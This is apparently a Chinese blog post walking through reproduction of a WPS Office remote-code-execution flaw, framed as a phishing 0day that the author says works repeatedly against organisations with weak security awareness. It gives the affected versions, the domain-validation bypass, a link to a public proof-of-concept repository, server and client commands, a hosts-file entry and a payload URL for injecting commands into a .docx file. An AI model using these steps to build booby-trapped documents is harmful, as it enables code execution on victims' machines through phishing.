分享

(已复现)WPS钓鱼0day分享

 zZ华 2023-11-12 发布于广东

这个day是今年国护的时候爆出来的,虽然国护已经过去很久但是这个day的杀伤力依旧很大,许多单位安全意识很薄,借助这个0day钓鱼可谓是屡试不爽。

漏洞影响

  WPS Office 2023个人版<11.1.0.15120;WPS Office 2019企业版<11.8.2.1208

漏洞原理

WPS 有内置浏览器,当打开该文档时, WPS  就会通过内置浏览器加载该链接。而有漏洞的版本对域名clientweb.docer.wps.cn.{xxxxx}wps.cn不进行检测,因而可以借助这个逻辑漏洞完成绕过。

复现准备:

本地复现

下载poc,需要python3.8以上的版本

https://github.com/ba0gu0/wps-rce

执行以下命令安装依赖文件

cd wps_rce
pip install -r requirement.txt -i https://pypi.tuna./simple

在server文件夹下运行

python3 main.py

图片

访问url

图片

在受害主机上添加host

vpsip clientweb.docer.wps.cn.

因此弹出计算器的payload为

http://clientweb.docer.wps.cn./calc

进入client文件夹运行

python main.py test.docx http://clientweb.docer.wps.cn./calc

test是要注入payload的文档

图片

生成带有命令的payload到目标主机上运行

图片

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多